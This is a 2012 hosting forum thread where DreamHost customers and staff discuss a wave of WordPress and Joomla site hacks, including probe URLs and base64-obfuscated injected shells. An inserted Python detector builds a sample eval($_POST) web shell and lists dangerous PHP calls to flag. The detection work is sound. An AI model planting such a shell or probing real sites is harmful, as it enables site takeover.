Sites hacked
03-01-2012, 02:46 PM
Post: #131
RE: Sites hacked
(03-01-2012 02:02 PM)labrocca Wrote:  I've set all my users to "Enhanced Security". I'm unsure why that's not default.
Historical reasons. It's on by default for new users now, and we will be retroactively turning it on in some cases as well.

(03-01-2012 02:02 PM)labrocca Wrote:  As I stated. It's not unusual to have a script require 777 for things like uploads.
This is actually not the case on our system — default permissions (755 for directories, 644 for files) will still allow uploads to work, as PHP scripts on our system run as the owner, not as the web server.

We've got a blog post in the works about this.

(03-01-2012 02:02 PM)labrocca Wrote:  So everyone in this thread with the exact same problem running on different accounts with different scripts all had backdoors? Yeah right. Maybe you're just not paying attention to what's going on here or maybe you've just not well versed on how things run.
I'm just listing off the most common causes of exploits that we've observed. I'm not trying to say that these are the only causes, simply that these are the most common.

We are taking steps to try to detect some of these situations proactively and notify customers when we notice something wrong — we aren't omniscient, though, and so we can't always catch problems before they are exploited.
03-01-2012, 02:50 PM
Post: #132
RE: Sites hacked
(03-01-2012 06:44 AM)constantandtrue Wrote:  Bobocat, all of my sites did have Extra Security. My sites were on two users... not individual users. I moved them to individual users last night.

Ok, that's probably the key. If you had Wordpress running on both of those users and they both had a theme or plugin with an exploit, then that would explain the problem. You need to amend your initial claim because moving them to individual users after the fact has no bearing on the discussion.

Apparently, even unused themes can be exploited. So if you had an old theme with the infamous timthumb function, then it could have been exploited, a backdoor/shell placed in each user's account, then every file within that user subsequently modified.

Your description is completely possible without any flaw in DH's security.
03-01-2012, 02:54 PM
Post: #133
RE: Sites hacked
(03-01-2012 02:44 PM)scubadollar Wrote:  So this script insertion file monitor you mentioned. Can you explain a bit more how this is carried out / implemented by the hacker, as I am still a bit unclear as to how my sites were hacked. As I mentioned, I have ruled out the WordPress and Joomla holes / failures, my user passwords are secure, and support swears up and down that no one had access to my ftp/shell account as a result of security breaches.

OK, so what happens is certain PHP programs have bugs which allow hackers to insert code into their operation. They probe actual PHP programs on your site by trying things like /wp-content/themes/myobscuretheme/index.php?=http:google.com. If they actually see a result through index.php that points them to google, they know that this php code actually executes the commands it's given under certain circumstances. Then they can insert code via a helpful php command that's hidden from view because they've encoded it using a php function called base64_encode.

The typical hack is to get a file monitor bootstrapped this way, then they can replace the underlying code, actually any code they want, with hacked code. If you have not enabled enhanced security, they can access with impunity the rest of your DreamHost account.

Since WordPress and Joomla and most everything else is open sourced, these trolls can download the source and look for weaknesses. When weaknesses are recognized by WordPress and others, updates are produced to patch the hole, so if a troll probes you and figures out what version of what you're running they can tailor the attack to your SPECIFIC installation.
03-01-2012, 02:54 PM
Post: #134
RE: Sites hacked
(03-01-2012 07:07 AM)p2ranger Wrote:  I also got hacked. I am using Concrete 5; it's up to its latest update according to the panel. The only thing I added to Concrete 5 was something that allows you to play MP3 files. Other than that it's an out-of-the-box Concrete 5 site. I also noticed that lots of comments got added to my Gallery site.

Can't say I'm real happy about all this

Just because an app is up to date does not mean that it's bullet-proof. Although most popular apps are quick to plug vulnerabilities, the time taken to issue an update is not instantaneous. There may well be an unpatched exploit in concrete5 or the 'something that allows you to play MP3 files'.
03-01-2012, 02:57 PM
Post: #135
RE: Sites hacked
(03-01-2012 02:31 PM)kelly7552 Wrote:  I'm planning on asking some friends to help blog innovative ways to 'harden' wordpress on dreamhost on this site repairitblog.org. PM me if you'd like to contribute as an author.

After you get through DreamHost & WordPress, it would be interesting to see other software distributions and other hosts.

Could be tremendously beneficial to the internet as a whole.
03-01-2012, 02:58 PM
Post: #136
RE: Sites hacked
1. Keep your software up to date.

2. Don't 777.

3. ENHANCED SECURITY


I learnt the hard way and got caught by all three and found a lot of silly old stuff lurking around my sites / domains / users that would have caught up with me sooner or later. Shit - I had some php4.2 users running.

Shitting on Dreamhost here isn't going to help. Unless we hear otherwise I'm assuming some group / botnet etc wandered into dreamhost hosting space, found 1000's of vulnerable sites all grouped together and let rip.
03-01-2012, 03:01 PM
Post: #137
RE: Sites hacked
(03-01-2012 09:25 AM)hgonzal Wrote:  I'm pretty sure it didn't have the base64_decode() function, but rather the hex-escape sequence...

Damn. I would have liked to have seen that alternate hex coded file.

If anyone here has a site that is still "hacked" or has backups of a site before running any awk, sed, grep, or cleaner scripts could you PM me as I'd like to check out that file.
Possible name : style.php - filesize : 21675 Bytes.


(03-01-2012 09:25 AM)hgonzal Wrote:  I followed its logic; after two unscramble steps it produces the following php:

Yep, that's the shell that can be POST'd to I mentioned previously.


(03-01-2012 01:18 PM)hgonzal Wrote:  Perhaps there is some pattern here?
(03-01-2012 11:18 AM)labrocca Wrote:  fyi I have a few WP...

^ This.


For the past several months standalones and botnets have been systematically tasting EVERY Wordpress and J! site that is listed in Google. Webhost1 WP users ground to a halt. Webhost2 WP users ground to a halt. Webhost3 WP users ground to a halt. One by one they all fell down. There is the pattern. Now it's arrived here -and after it's done it will move on to the next ones on the list.

The attack is against known exploits, most of which do not succeed here. The ones that do work (everywhere) are because of the plugins and themes used that are poorly coded and thus create security holes in an otherwise sane codebase. Unfortunately it would appear that at least one theme or plugin that is installed by default during the One-Click process was exploitable.

Note that this is not restricted to "free plugins" or "free themes". A very highly regarded Joomla! Extension business (professional, costly extensions) had to recently rewrite a sizeable percentage of its Pay-Only components because they were all being exploited during this latest wave of attacks. Call it 0day if you want (it certainly isn't) but the injectors were all over it well before the "professionals".


Also, everyone is a guru on teh_interwebs \m/

Wink

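The obfuscated shell discussed in the posts above (a base64_decode() layer or a hex-escape layer hiding an eval() that can be POST'd to) is the kind of thing a defender can look for before running any cleaner scripts. The following is an added example, not code from this thread or from DreamHost: it peels the two unscramble layers from a constructed sample and reports the dangerous calls left behind. The sample payload, the regexes and the function names are all assumptions made for the demonstration.

```python
import base64
import binascii
import re

# Constructed sample: a tiny placeholder "shell" hidden behind two layers, a
# hex-escape layer inside a base64 layer (the two unscramble steps in the post).
# The inner text is a harmless stand-in that only has the eval($_POST[...]) shape.
INNER_PAYLOAD = "<?php if (isset($_POST['c'])) { @eval($_POST['c']); } ?>"
HEX_LAYER = "".join("\\x%02x" % b for b in INNER_PAYLOAD.encode())
B64_LAYER = base64.b64encode(HEX_LAYER.encode()).decode()
SAMPLE_INFECTED = '<?php /* theme footer */ eval(base64_decode("%s")); ?>' % B64_LAYER
SAMPLE_CLEAN = "<?php get_header(); the_content(); get_footer(); ?>"

B64_CALL = re.compile(r'base64_decode\(\s*["\']([A-Za-z0-9+/=]{40,})["\']\s*\)')
HEX_RUN = re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}")          # "\x65\x76..." runs
DANGEROUS = re.compile(r"\b(eval|assert|system|passthru|shell_exec|exec)\s*\(")

def unscramble(src, max_layers=5):
    """Peel base64_decode("...") and hex-escape layers; return (layers, decoded)."""
    layers = []
    for _ in range(max_layers):
        m = B64_CALL.search(src)
        if m:
            try:
                inner = base64.b64decode(m.group(1)).decode("latin-1")
            except (binascii.Error, ValueError):
                break                      # not real base64, stop peeling
            src = src[:m.start()] + inner + src[m.end():]
            layers.append("base64")
            continue
        m = HEX_RUN.search(src)
        if m:
            raw = bytes.fromhex(m.group(0).replace("\\x", ""))
            src = src[:m.start()] + raw.decode("latin-1") + src[m.end():]
            layers.append("hex")
            continue
        break                              # nothing left to unscramble
    return layers, src

def scan_php_source(src):
    """Report obfuscation layers and dangerous calls visible after decoding."""
    layers, decoded = unscramble(src)
    indicators = sorted(set(DANGEROUS.findall(decoded)))
    post_controlled = "$_POST" in decoded or "$_REQUEST" in decoded
    return {"layers": layers, "indicators": indicators,
            "post_controlled": post_controlled,
            "suspicious": bool(layers) or bool(indicators)}

if __name__ == "__main__":
    for name, s in (("infected", SAMPLE_INFECTED), ("clean", SAMPLE_CLEAN)):
        print(name, scan_php_source(s))
```

Run it over each .php file from a backup taken before any awk/sed cleanup, and compare the decoded text against the file's modification time to find the first injected file.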
03-01-2012, 03:13 PM (This post was last modified: 03-01-2012 03:15 PM by bobocat.)
Post: #138
RE: Sites hacked
(03-01-2012 01:13 PM)labrocca Wrote:  Most were 5.2 with extra security. I will also be disabling some php functions like fsockopen.

What a mess DH. I can't decide which disappoints me more. Their lack of response or their lack of security.

While I agree with the disappointing response time / usefulness of some responses, some of the onus must be borne by you by your own admission that only some users were running with extra security. Unless you can show that the exploit crossed that boundary, then DH can not be held accountable.

DH provides a hosting service, not a software service. We choose the software, usually with a no guarantees license. If you choose to run the software in a userspace which is not secured from other users, then an exploit in one can lead to damage in the other.

That being said, DH should probably do more than just set the most secure option as default. Anything that decreases security, including automatically setting up ftp and phpmyadmin entry points, should only be done after sufficiently warning the users of the costs and benefits of such a decision rather than as just another option to pick when setting up hosting. All of these options ought to be flagged consistently as potentially decreasing security. An extreme might even be to put all of these options into a separate grouping in the panel and labelling it as decreased security or something like that.


(03-01-2012 11:18 AM)labrocca Wrote:  I can confirm that and I was on php 5.2.

But in a later post you wrote that some had enhanced web security....
03-01-2012, 03:17 PM
Post: #139
RE: Sites hacked
(03-01-2012 02:54 PM)kelly7552 Wrote:  OK, so what happens is certain PHP programs have bugs which allow hackers to insert code into their operation. They probe actual PHP programs on your site by trying things like /wp-content/themes/myobscuretheme/index.php?=http:google.com. If they actually see a result through index.php that points them to google, they know that this php code actually executes the commands it's given under certain circumstances. Then they can insert code via a helpful php command that's hidden from view because they've encoded it using a php function called base64_encode.

The typical hack is to get a file monitor bootstrapped this way, then they can replace the underlying code, actually any code they want, with hacked code. If you have not enabled enhanced security, they can access with impunity the rest of your DreamHost account.

Since WordPress and Joomla and most everything else is open sourced, these trolls can download the source and look for weaknesses. When weaknesses are recognized by WordPress and others, updates are produced to patch the hole, so if a troll probes you and figures out what version of what you're running they can tailor the attack to your SPECIFIC installation.

Thanks Bill,

this is understood, it is why popular themes and plugins need to be updated when these weaknesses are found, but it is still in the realm of "your WordPress or Joomla install is insecure". In my experience, hackers do not do this to custom sites unless they are very popular, there is an obvious exploitable hole or there is some info to gain. Of course sometimes they are just bored, but there is no evidence that this was a bored person's attack.

I have a site running that was completely custom built and uses no recognizable file structure, no third party plugins, no third party scripts at all. It is not even remotely similar to Wordpress or Joomla or any other open source system out there in file structure or coding. It is on an individual user account with enhanced security and one week ago I was forced to download the site and clean out the same hacks.

So basically I am now led to believe that some guy in Ukraine just has it in for me and spent whatever time it took to individually seek out and exploit my custom site, which garners about 80 hits a month, hardly a target worth the effort.

I am still leaning toward the security on the servers themselves being the real issue here. Either these hacks are jumping from user to user through security holes or there are some deeper security issues.

Still looking for the right answers
03-01-2012, 03:20 PM (This post was last modified: 03-01-2012 03:22 PM by amphibious.)
Post: #140
RE: Sites hacked
(03-01-2012 02:58 PM)eggybobeggles Wrote:  Shitting on Dreamhost here isn't going to help. Unless we hear otherwise I'm assuming some group / botnet etc wandered into dreamhost hosting space, found 1000's of vulnerable sites all grouped together and let rip.

They have a security breach in January and it doesn't seem like any sensitive data was taken... yet they take precautions, do the right thing, and force a password reset.

Good decision...

In mid-February, all of a sudden, potentially thousands of sites that they host start forwarding people to porn/malware sites. They do nothing, give callous answers to their users looking for help, and do not provide their paying customers a clear path to remove the crap and secure their sites. Additionally, they don't seem to be providing their paying customers any notification to alert them that there may be an issue.

Bad decision...

I think that's absolutely deserving of "shitting on DreamHost" for.

How difficult would it be to send out another mass email with explicit instructions on what's going on and how to fix it?